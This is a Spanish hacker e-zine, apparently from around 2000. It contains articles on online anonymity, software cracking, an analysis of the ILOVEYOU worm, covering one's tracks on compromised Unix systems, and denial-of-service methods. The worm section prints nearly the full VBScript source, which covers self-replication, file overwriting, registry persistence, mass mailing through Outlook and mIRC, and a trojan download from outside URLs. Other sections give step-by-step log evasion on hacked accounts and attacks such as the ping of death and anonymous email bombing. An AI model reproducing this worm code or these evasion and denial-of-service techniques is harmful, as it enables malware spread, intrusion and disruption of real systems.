[ E-ZiNe ] [ Vol. II] +--------------------------------------------------------------------+ || |::| [ASCii/Dr_X] |::::| |:: ::| |:: ::| =[ a QuALiTy tEaM iN Mx ]= |:: ::| ||||||:: ::|||||| |::::::: :::::::| """""$$$$$$$$$$""""" ::| |$$$$$$$$$$. ::| |:$$$$$$$$$$. ::| |::$$$$$$$$$$. ::| |:: $$$$$$$$$$ $$$$$$$. $$$$$$$| |:: $$$$$$$$$$ $$$$$$$. $$$$$$$:| |:: $$$$$$$$$$ $$$$$$$. $$$$$$$::| |:: $$$$$$$$$$ $$$$$$$oooooo$$$$$$$.::| |::ooooo$$$$$$$$$$ooooo $$""""""$$$$$$$. ::| |:: ...............oooo$$$......$$$$$$$. ::| |:: $$$$$$$. $$$$$$$. ::| |:: $$$$$$$. $$$$$$$. ::| |:: $$$$$$$. $$$$$$$. ::| |:: ....... ....... ::| |888888888888888888888888888888888888888888888888888888| $$$$$$$$$$$$$$$$$$[ InsaneHackers Team ]$$$$$$$$$$$$$$$$$$ ============================================================ ... La E-ZinE +--------------------------------------------------------------------+ [ c0nTenId0 ] .-==========================================-. | 0. Advertencia (Disclaimer).......[IH Team]| | 1. CreCiMiEntO dEL tEaM...........[MIBXXX] | | 2. AnONiMaTo eN iNtErNeT I........[MIBXXX] | | 3. Noticias.......................[MIBXXX] | | 4. Introduccion al Cracking.......[Dr_X] | | 5. Analisis del Virus I-Love-You..[MIBXXX] | | 6. Borrando huellas en *nix.......[MIBXXX] | | 7. Averiguando IPs en el IRC......[CAOS] | | 8. Proximo Numero de IH E-ZiNe....[MIBXXX] | | 9. Despedida......................[IH TEAM]| '-==========================================-' ==================================================================== л[IH E-Zine]ллллллллллллллллллллллллллллллллллллллллллллллл[Vol.II]л ==================================================================== -*- ADVERTENCIA (DISKLAIMER) -*- La infromacion contenida dentro de este boletin es reunida con fines EXCLUSIVAMENTE educativos, ya ke el uso de esta informa- cion puede llevar a actos ilegales en la mayoria de los paises los cuales pueden llegar a ser sancionados hasta con la priva- cion de tu libertad. Asi es ke ya sabes... estas actuando bajo tu propio riesgo, ni los miembros de IH ni los puntos de dis- tribucion de esta E-Zine pueden ser considerados responsables por lo ke hagas o no con esta informacion. Ya pusimos esto, asi ke olvidate de demandarnos en kaso de ke algo salga mal jejeje. ==================================================================== л[IH E-Zine]ллллллллллллллллллллллллллллллллллллллллллллллл[Vol.II]л ==================================================================== -------------------------------- | CrEcImIeNtO dEL TeAm!!! | -------------------------------- Por: MIBXXX Los miembros de IH estamos hiper contentos pues cada vez recibi- mos mas visitantes, cada vez son mas las personas ke se dirigen a nosotros para resolver sus dudas de seguridad informatica. Tam- bien cada vez recibimos mas visitantes y mensajes de otros teams osease ke como dice un viejo dicho... "Cuando el rio suena es ke agua lleva", por lo ke creemos ke poco a poco nos acercamos a la meta establecida y creemos que vamos por buen camino. Keremos a- gradecer a todos akellos usuarios y a las pocas empresas que han confiado en nosotros para ser su fuente confiable de informacion underground en Mexico. Gracias a todos! ==================================================================== л[IH E-Zine]ллллллллллллллллллллллллллллллллллллллллллллллл[Vol.II]л ==================================================================== ******************************* * Anonimato en Internet pt.I * ******************************* Por: MIBXXX Aunke Internet parezka un medio anonimo donde cada persona es libre de hacer y deshacer pues nadie lo conoce, la realidad es otra. Con el simple hecho de accesar a una pagina de WWW a tra- ves de los browsers mas comunes es posible que el servidor dete- cte tu IP, el pais de origen, tipo de PC, Nombre real, ISP, re- gion en la que te encuentras, etc. Informacion que posterior- mente puede ser usada en tu contra. Lo mismo aplica a servicios como el IRC, el ICQ o los juegos en linea. Al obtener un poquito de la informacion de usuario es facil empezar la investigacion y encontrar todos los datos del usuario. Como si esto no fuera suficiente, algunos ISPs tienen aparte un finger daemon, que es un programa que espera conexiones a un puerto (por lo regular el 79 y una vez que alguien se conecta a este puerto con tan simple- mente teclear el nombre de usuario (login) el cual es facil de obtener pues constituye el user en la direccion de e-mail, el ser- vidor le regresara una cantidad de informacion acerca del usuario inlcuyendo el nombre completo, ultima vez que se conecto, si el usuario esta en-linea en ese momento y hasta si tiene correo nuevo o no (algunos despliegan hasta el numero de telefono y la direccion de su domicilio). Como podras ver la anonimidad en internet no existe realmente en primera instancia (aunque si existen medios no tan conocidos para poder surfear realmente anonimo), practica- mente cualquier usuario con un poco de conocimiento acerca de internet y de la forma como trabaja puede obtener una gran cantidad de informacion tuya (esto por suspuesto incluye a los fedz). En los siguientes numeros de este e-zine describiremos paso a paso las formas y metodos para permanecer anonimo en internet asi como los diferentes metodos para reunir informacion acerca de un usuario o servidor. Sabemos que te conviene seguir leyendo :) ==================================================================== л[IH E-Zine]ллллллллллллллллллллллллллллллллллллллллллллллл[Vol.II]л ==================================================================== ___ _ _____ _ _ _ ______ / \/ \/. __\/ \/ \/ \/ ___\ *N0tiCiaS* | | | |-- | | | | \ | | | |___| |___ | \_/\___/\_____/\___/\___/\______/ 15 de Julio... Se Libera oficialmente esta E-Zine... 2/6/00 jojojo 14 de Julio... Se inician acuerdos entre IH y dos teams espaЄoles para realizar un meeting 9 de Julio... Se inicia la coordinacion del meeting nacional de teamz 2 de Julio... Votaciones federales en Mexico, varios hackers son contratados por sumas impresionantes para proteger los servidores del IFE a nivel nacional. Por desgra- cia muchos de esos "hackers" realmente eran wannabes por lo que en algunos estados la proteccion no fue tanta. 18 de Junio... Se inician platicas entre IH y Hmx para coordinar otro meeting de teamz a nivel latinoamerica. ==================================================================== л[IH E-Zine]ллллллллллллллллллллллллллллллллллллллллллллллл[Vol.II]л ==================================================================== +++++++Introduccion al Cracking++++++ ++++(Capitulo I. Software I)+++ By Dr_X Este curso de divide en varios capitulos: Capitulo I. Crackeo de Software o Cracking clasico (tipos de proteccion, metodos de desproteccion, etc.) Capitulo II. Crackeo de Sitios WWW. (obtencion de login y password en las paginas que lo requieren) Capitulo III. Cracking=degeneracion del Hacking. (el cracking de servidores, sus metodos y objetivos) Antes de empezar me gustaria poner en claro algunos conceptos. Shareware.- Programas distribuidos gratuitamente pero que vienen con algun tipo de bloqueo de funciones o con un limite de tiempo de funcionamiento y que requieren del pago del "registro" para poder ser utilizados libremente. Debugger.- Programa que nos permite observar las acciones de un programa al ser ejecutado, tales como los registros de memoria, las lineas del codigo que estan siendo ejecutadas, las funciones a las que llama el programa, los interrupts que solicita, etc. ASM.- Lenguaje ensamblador, es uno de los lenguajes de programa- cion mas "simples" pues es practicamente lenguaje ordenador basico. Compilador.- Programa que nos permite convertir un archivo de codigo fuente en un archivo executable. Decompilador.- Programa que permite regresar un executable a su codigo fuente original. Que es el crackeo de software? El crackeo de software consiste principalmente en la desproteccion o desbloqueo de programas. Es mas que comun encontrar que al instalar un programa nos solicite un numero de serie, o que al instalar un programa shareware trai- ga algunas opciones bloqueadas o un limite de tiempo para su uso. Aqui es precisamente en donde entra el cracking, pues nos permite generar esos codigos o modificar el programa original para evitar esas molestas protecciones supuestamente "anti-pirateria". Tipos de proteccion.- Los tipos de proteccion mas comunes son: Numero de serie: Es un numero que viene con la documentacion o CD original el cual es necesario para instalar el programa. Chequeo de CD: Algunos programas a la hora de ser ejecutados realizan una rutina de lectura en la unidad de CD para verificar que el CD original se encuentre insertado. Anti-copia de CD:Algunos CDs incluyen datos "ocultos" que supuesta- mente impiden que el CD sea copiado en su totalidad. Datos del registro: Algunos programas Shareware requieren de que sean introducidos los datos con los cuales se regis- tro el programa. Esos datos pueden ser nombre, compaЄia, email, pais y siempre van acompaЄados de algun numero o codigo de registro. Bomba de Tiempo: Otros programas Shareware o Demos traen una rutina que registra el dia de instalacion y bloquea el uso del programa tras x dias de uso. Hasta aqui por el momento me despido... (esperen saber mas de mi)... ... |)r >< ... dr_xr00tx@hotmail.com ==================================================================== л[IH E-Zine]ллллллллллллллллллллллллллллллллллллллллллллллл[Vol.II]л ==================================================================== --------[ Analisis del virus I-Love-you.vb]-------- PoR: MIBXXX Hace algunos meses se dio un fenomeno de panico a nivel mundial... Todo mundo estaba recibiendo un e-mail con el subject "I love you" o "Love letter for you", el cual como es de imaginarse todo mundo abria para ver de que se trataba. Sin embargo se llevaban una desagradable sorpresa pues por lo regular todos los browsers de web estan habilitados para ejecutar Visual Basic Script y de hecho los lectores de email mas comunes como el Eudora o el Outlook tambien tienen este defecto, por lo que el script incluido en el mail era ejecutado y ZAZ! su PC estaba infectada. Se "sabe" que este virus nacio en Filipinas, sin embargo aunque algunas agencias aseguren haber capturado al creador de este virus la realidad sigue siendo algo "borrosa". Hay quienes ven a este virus como lo maximo pues no habia habido una propa- gacion tan rapida y exitosa desde el aЄo 1994, cuando el NATAS puso a temblar a la comunidad informatica a nivel mundial. Desde mi punto de vista quien hizo este virus fue alguien muy inteligente pues se dio cuenta de que las PCs no estaban protegi- das contra este tipo de ataques. Ya se sabia de cookies malignas distribuidas en el WWW o de Scripts que sacaban informacion "de mas" de las PCs que los ejecutaban pero aun asi no se podia pre- venir una infeccion por este medio pues son demasiadas las paginas de WWW que incluyen VBscript para su correcto funcionamiento. Pero a pesar de ser muy inteligente para mi gusto no es mas que un lamer, alguien que conocia de programacion en VB pero que estoy casi seguro que es incapaz de realizar un virus REAL de infeccion directa. El I-Love-You es un virus basado en las WoRMs (termino que parece haber pasado a la historia) las cuales no eran mas que como su nombre lo dice "lombrices" que se reproducian y mandaban una y otra vez en la red. Por lo regular quienes hacian las worms las hacian principalmente por el simple hecho de ver que tan rapido se propagaban y a que tantos lugares llegaban y en si el unico daЄo que causaban al usuario era que se le podia saturar la cuenta de e-mail. Las worms son comparables con las cadenitas que han existido desde siempre (antes era por papel, ahora por e-mail), el tipico mail de "Envialo a X personas y recibiras esto o no lo hagas y te ira mal", se ha demostrado que los creadores de esas cadenas realmente lo ven como un medio de diversion y aunque suene increible aun hay personas que llegan a decirte "Yo si lo envie pues dijeron que al dar la vuelta al mundo nos iban a dar $$$" o "Si lo enviaba me regalaban un celular", pues dejenme decirles algo... ESTO ES FALSO, ninguna compaЄia respetable usaria un metodo tan poco efec- tivo como medio publicitario o de prueba!!!!!. Sin embargo tras la aparicion del I-Love-you original varias per- sonas con un poco mas de conocimientos informaticos que el crea- dor original han modificado el codigo y creado sus propias versiones de este virus, cada vez con acciones mas efectivas. He podido ana- lizar versiones de este virus (me referire como ILY por comodidad) destinadas a eliminar grandes cantidades de archivos, ejecutar troyanos e inclusive instalar key loggers. De cualquier forma incluyo en esta e-zine el codigo fuente de una de las versiones del ILY para que aquellos que sepan algo de VB puedan analizar su funcionamiento paso a paso. El codigo ha sido levemente modificado para evitar que se ejecute al ser abierto este e-zine por algun lector o browser desprotegido. Inicio del codigo del I-Love-you.vbs ------------------------------------ ..rem barok -loveletter(vbe) ..rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / ..Manila,Philippines ..On Error Resume Next ..dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow ..eq="" ..ctr=0 ..Set fso = CreateObject("Scripting.FileSystemObject") ..set file = fso.OpenTextFile(WScript.ScriptFullname,1) ..vbscopy=file.ReadAll ..main() ..sub main() ..On Error Resume Next ..dim wscr,rr ..set wscr=CreateObject("WScript.Shell") ..rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting ..Host\Settings\Timeout") ..if (rr>=1) then ..wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting ..Host\Settings\Timeout",0,"REG_DWORD" ..end if ..Set dirwin = fso.GetSpecialFolder(0) ..Set dirsystem = fso.GetSpecialFolder(1) ..Set dirtemp = fso.GetSpecialFolder(2) ..Set c = fso.GetFile(WScript.ScriptFullName) ..c.Copy(dirsystem&"\MSKernel32.vbs") ..c.Copy(dirwin&"\Win32DLL.vbs") ..c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") ..regruns() ..html() ..spreadtoemail() ..listadriv() ..end sub ..sub regruns() ..On Error Resume Next ..Dim num,downread ..regcreate .."HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs" ..regcreate .."HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs" ..downread="" ..downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet ..Explorer\Download Directory") ..if (downread="") then ..downread="c:\" ..end if ..if (fileexist(dirsystem&"\WinFAT32.exe")=1) then ..Randomize ..num = Int((4 * Rnd) + 1) ..if num = 1 then ..regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start ..Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" ..elseif num = 2 then ..regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start ..Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" ..elseif num = 3 then ..regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start ..Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" ..elseif num = 4 then ..regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start ..Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe" ..end if ..end if ..if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then ..regcreate .."HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe" ..regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet ..Explorer\Main\Start Page","about:blank" ..end if ..end sub ..sub listadriv ..On Error Resume Next ..Dim d,dc,s ..Set dc = fso.Drives ..For Each d in dc ..If d.DriveType = 2 or d.DriveType=3 Then ..folderlist(d.path&"\") ..end if ..Next ..listadriv = s ..end sub ..sub infectfiles(folderspec) ..On Error Resume Next ..dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 ..set f = fso.GetFolder(folderspec) ..set fc = f.Files ..for each f1 in fc ..ext=fso.GetExtensionName(f1.path) ..ext=lcase(ext) ..s=lcase(f1.name) ..if (ext="vbs") or (ext="vbe") then ..set ap=fso.OpenTextFile(f1.path,2,true) ..ap.write vbscopy ..ap.close ..elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or ..(ext="sct") or (ext="hta") then ..set ap=fso.OpenTextFile(f1.path,2,true) ..ap.write vbscopy ..ap.close ..bname=fso.GetBaseName(f1.path) ..set cop=fso.GetFile(f1.path) ..cop.copy(folderspec&"\"&bname&".vbs") ..fso.DeleteFile(f1.path) ..elseif(ext="jpg") or (ext="jpeg") then ..set ap=fso.OpenTextFile(f1.path,2,true) ..ap.write vbscopy ..ap.close ..set cop=fso.GetFile(f1.path) ..cop.copy(f1.path&".vbs") ..fso.DeleteFile(f1.path) ..elseif(ext="mp3") or (ext="mp2") then ..set mp3=fso.CreateTextFile(f1.path&".vbs") ..mp3.write vbscopy ..mp3.close ..set att=fso.GetFile(f1.path) ..att.attributes=att.attributes+2 ..end if ..if (eq<>folderspec) then ..if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or ..(s="script.ini") or (s="mirc.hlp") then ..set scriptini=fso.CreateTextFile(folderspec&"\script.ini") ..scriptini.WriteLine "[script]" ..scriptini.WriteLine ";mIRC Script" ..scriptini.WriteLine "; Please dont edit this script... mIRC will ..corrupt, if mIRC will" ..scriptini.WriteLine " corrupt... WINDOWS will affect and will not ..run correctly. thanks" ..scriptini.WriteLine ";" ..scriptini.WriteLine ";Khaled Mardam-Bey" ..scriptini.WriteLine ";http://www.mirc.com" ..scriptini.WriteLine ";" ..scriptini.WriteLine "n0=on 1:JOIN:#:{" ..scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" ..scriptini.WriteLine "n2= /.dcc send $nick .."&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" ..scriptini.WriteLine "n3=}" ..scriptini.close ..eq=folderspec ..end if ..end if ..next ..end sub ..sub folderlist(folderspec) ..On Error Resume Next ..dim f,f1,sf ..set f = fso.GetFolder(folderspec) ..set sf = f.SubFolders ..for each f1 in sf ..infectfiles(f1.path) ..folderlist(f1.path) ..next ..end sub ..sub regcreate(regkey,regvalue) ..Set regedit = CreateObject("WScript.Shell") ..regedit.RegWrite regkey,regvalue ..end sub ..function regget(value) ..Set regedit = CreateObject("WScript.Shell") ..regget=regedit.RegRead(value) ..end function ..function fileexist(filespec) ..On Error Resume Next ..dim msg ..if (fso.FileExists(filespec)) Then ..msg = 0 ..else ..msg = 1 ..end if ..fileexist = msg ..end function ..function folderexist(folderspec) ..On Error Resume Next ..dim msg ..if (fso.GetFolderExists(folderspec)) then ..msg = 0 ..else ..msg = 1 ..end if ..fileexist = msg ..end function ..sub spreadtoemail() ..On Error Resume Next ..dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad ..set regedit=CreateObject("WScript.Shell") ..set out=WScript.CreateObject("Outlook.Application") ..set mapi=out.GetNameSpace("MAPI") ..for ctrlists=1 to mapi.AddressLists.Count ..set a=mapi.AddressLists(ctrlists) ..x=1 ..regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) ..if (regv="") then ..regv=1 ..end if ..if (int(a.AddressEntries.Count)>int(regv)) then ..for ctrentries=1 to a.AddressEntries.Count ..malead=a.AddressEntries(x) ..regad="" ..regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) ..if (regad="") then ..set male=out.CreateItem(0) ..male.Recipients.Add(malead) ..male.Subject = "ILOVEYOU" ..male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from ..me." ..male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") ..male.Send ..regedit.RegWrite .."HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" ..end if ..x=x+1 ..next ..regedit.RegWrite .."HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count ..else ..regedit.RegWrite .."HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count ..end if ..next ..Set out=Nothing ..Set mapi=Nothing ..end sub ..sub html ..On Error Resume Next ..dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 ..dta1="LOVELETTER - HTML<?-?TITLE><META ..NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ .."<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? ..@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ .."<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is ..good...@-@>"&vbcrlf& _ .."<?-?HEAD><BODY ..ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ .."&vbcrlf& _ .."ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ ..BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ .."<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to ..read this HTML file<BR>- Please press #-#YES#-# button to Enable ..ActiveX<?-?p>"&vbcrlf& _ .."<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ ..BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> .."&vbcrlf& _ .."<?-?BODY><?-?HTML>"&vbcrlf& _ .."<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ .."<!--?-??-?"&vbcrlf& _ .."if (window.screen){var wi=screen.availWidth;var ..hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& .._ .."?-??-?-->"&vbcrlf& _ .."<?-?SCRIPT>"&vbcrlf& _ .."<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ .."<!--"&vbcrlf& _ .."on error resume next"&vbcrlf& _ .."dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ .."aw=1"&vbcrlf& _ .."code=" ..dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ .."set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ .."code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ .."code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ .."code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ .."set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& .._ .."wri.write code4"&vbcrlf& _ .."wri.close"&vbcrlf& _ .."if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ .."if (err.number=424) then"&vbcrlf& _ .."aw=0"&vbcrlf& _ .."end if"&vbcrlf& _ .."if (aw=1) then"&vbcrlf& _ .."document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ .."window.close"&vbcrlf& _ .."end if"&vbcrlf& _ .."end if"&vbcrlf& _ .."Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ .."regedit.RegWrite ..@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& .._ .."?-??-?-->"&vbcrlf& _ .."<?-?SCRIPT>" ..dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") ..dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") ..dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") ..dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") ..dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") ..dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") ..dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") ..dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") ..set fso=CreateObject("Scripting.FileSystemObject") ..set c=fso.OpenTextFile(WScript.ScriptFullName,1) ..lines=Split(c.ReadAll,vbcrlf) ..l1=ubound(lines) ..for n=0 to ubound(lines) ..lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) ..lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) ..lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) ..if (l1=n) then ..lines(n)=chr(34)+lines(n)+chr(34) ..else ..lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" ..end if ..next ..set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") ..b.close ..set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) ..d.write dt5 ..d.write join(lines,vbcrlf) ..d.write vbcrlf ..d.write dt6 ..d.close ..end sub ------------------------------ Fin del codigo del I-LOVE-YOU.TXT.vbs Como podran ver no es la gran cosa de virus, he visto virus mucho mas complejos y menos famosos. Supuestamente las URLs a las ke se trata de conectar el virus han sido deshabilitadas, pero como veran es demasiado facil para cualquiera modificar este codigo y re-habi- litar el virus por lo que hay que estar alertas. Si algun dia de estos se me quita la flojera y los demas miembros del team contribuyen un poco mas con articulos para que me quede mas tiempo para realizar BUENOS articulos les incluire un anali- sis paso a paso de todas las instrucciones de este virus. Espero que todo este relajo y todo el codigo les haya servido de algo jejejeje. Atte... MIBXXX [IH Team] mibxxx@insanehackers.org ==================================================================== л[IH E-Zine]ллллллллллллллллллллллллллллллллллллллллллллллл[Vol.II]л ==================================================================== --[ BoRrAnD0 tUs HuELLaS eN sIsTemAs *nix ]-- By: MIBXXX Parte. I. Es bastante comun que algun hack-wannabe reciba algun texto explicando como realizar un hack sencillo o algun amigo le proporcione los datos de alguna shell y de inmediato se lance a probar si en efecto funciona, todo esto sin darse cuenta de algo importantisimo, esta dejando su rastro en el servidor "victima", error que lo puede llevar derechito a la "casa grande" o carcel. Es por esto que el saber borrar las huellas en sistemas *nix es indispensable para cualquiera que se quiera adentrar en esto del hack. En esta primera parte de este curso explicare como evitar dejar huellas. 1. Cambio de shell. Por lo regular los sistemas de logging solo sirven en el shell principal del sistema, si este shell se cambia el logging para. Para esto recomiendo el shell SH y CSH, pues aunque existen otros shellz como el Bash, zsh, etc. estos incluyen funciones extras, por lo que les sugiero que se vayan a lo basico. El prompt del SH Shell es el comun $ y el del CSH Shell es el %, por lo que si al entrar recibes un $ cambialo a CSH y viceversa. Asi evitaras que se registren los comandos ejecutados evitando asi que el root identifique el metodo de hack empleado y los daЄos ocasionados. 2. Modificar el LASTLOG Si al entrar recibes un mensaje como "Last successful login from sub.host.com" ya que estas usando la cuenta hackeada, lo que tienes que hacer para que esto cambie y tu host no sea visible es usar el comando rlogin (mismo que no se por que ya casi nadie usa pues en muchos casos es mejor que el Telnet) y volver a introducir los datos de la cuenta hackeada, asi el LastLogin cambiara a LOCALHOST, pues el ultimo login se hizo desde la misma makina. Claro esta que tras ejecutar el rlogin tienes que darle un exit para regre- sar a el login original, pero ya hay un nuevo ultimo login y es mucho mas dificil de rastrear que tu host real. 3. Usando el WHO Tras haber hecho lo anteriormente descrito teclea "w", esto te dara una lista de los usuarios on-line en ese momento junto con la direccion desde la cual se estan conectando. Si ves ahi tu host entonces teclea nuevamente login y vuelve a darle los datos de la cuenta hackeada, con esto el host cambiara a la emulacion de terminal que se esta empleando (tty05 o algo similar). Esto aun funciona en algunas versiones. 4. Telnet Si usas telnet para tu hack ten mucho cuidado, pues algunos clientes de telnet mandan varios datos acerca de ti, cambialos. Estos datos son por ejemplo HOME, MAIL, UID, etc. de hecho cambia tambien el directorio para evitar los datos del PWD. Independientemente de esto NUNCA abras la sesion con "telnet host.victima.com", mejor inicia primero la sesion de telnet y luego mandar la conexion con "open host.victima.com" para que asi no se registre la direccion dentro del log de procesos. En numeros proximos seguire explicando como evitar dejar huellas asi como los metodos para borrarlas. ==================================================================== л[IH E-Zine]ллллллллллллллллллллллллллллллллллллллллллллллл[Vol.II]л ==================================================================== +++++ dEnIaL oF sErViCe +++++ Por: MIBXXX Gracias a Roke [DHC] Ping mortifero (el famosisisisimo) Este DoS es para ser ejecutado desde maquinas corriendo Windows, y consiste en un ping tan grande que puede desconectar, congelar y hasta resetear victimas. En la linea de comandos de MS-Dos teclea: ping -l 65510 makina.victima.com E-mail bombing Este ataque puede saturar y hasta cancelar buzones y consiste en enviar demasiados mails y muy largos a una misma direccion. Recomendamos usar e-mails anonimos para esto. En sistemas *nix es posible enviar archivos de otros servidores, te recomiendo enviar los archivos ubicados en el directorio /bin/ls que son las listas de archivos, los cuales pueden llegar a ser enormes (usa servidores como ftp.cdrom.com jejeje). Atakes ICMP Consisten en enviar al usuario diferentes rutas o falsos mensajes que van a alentar la conexion y/o desconectarla. Mensajes mas comunes: Packet too big Destination unreachable Parameter Problem El FTP de Novell Netware El servidor de FTP de Novell se crashea si recibe demasiadas conexiones al mismo tiempo o muchas conexiones en un corto periodo de tiempo. (Cuando corregiran ese bug los idiotas) Deshabilitar cuentas En algunos servers las cuentas se deshabilitan despues de X intentos de login fallidos o despues de mucho tiempo idle (en espera de datos). Puede funcionar para evitar que alguien entre al sistema en un buen rato. Servidores X-Windows Si el server acepta conexiones Telnet, es posible crashearlo al realizar muchas conexiones al mismo tiempo (puertos 6000- 6025 por lo regular). Creo ke con esto se pueden divertir un rato jejejejeje. MIBXXX [IH TEA/\/\] mibxxx@insanehackers.org ==================================================================== л[IH E-Zine]ллллллллллллллллллллллллллллллллллллллллллллллл[Vol.II]л ==================================================================== +-------------------------------+ | PrOXiMaMeNtE eN IH- E-ZiNe... | +-------------------------------+ *** AnOnImaTo eN InTeRnEt pArTe II*** *** CrACkIng dE SoFt II*** *** AnALiSiS DeTaLLaDo dE ViRii *** *** HiSToRIa DeL PHrEAKiNg *** *** Borrando TuS HuELLaS eN *nix II *** ==================================================================== л[IH E-Zine]ллллллллллллллллллллллллллллллллллллллллллллллл[Vol.II]л ==================================================================== ...*** Despedida ***... Bueno amigos hemos presentado el no. 2 de nuestra E-Zine, ofrece- mos disculpas por el retraso que hubo en la liberacion de esta. Si deseas contribuir con esta e-zine simplemente manda tu articu- lo a team@insanehackers.org y si es de buena calidad sera inclui- do. Si quieres contribuir con nosotros simplemente ponte en contac- to con algun miembro del team y preguntale en que puedes colaborar. Todas las colaboraciones son bien recibidas. Espero ke esta informacion les haya sido util y recuerden... No hagan cosas malas ke parezkan buenas (hay ke ser honestos) jejejeje Free your mind... (roka de malicious team) La curiosidad nos lleva al conocimiento, el conocimiento nos da poder, el poder nos da fuerza, la fuerza nos da libertad y la libertad nos da la felicidad.... (MIBXXX IH Team)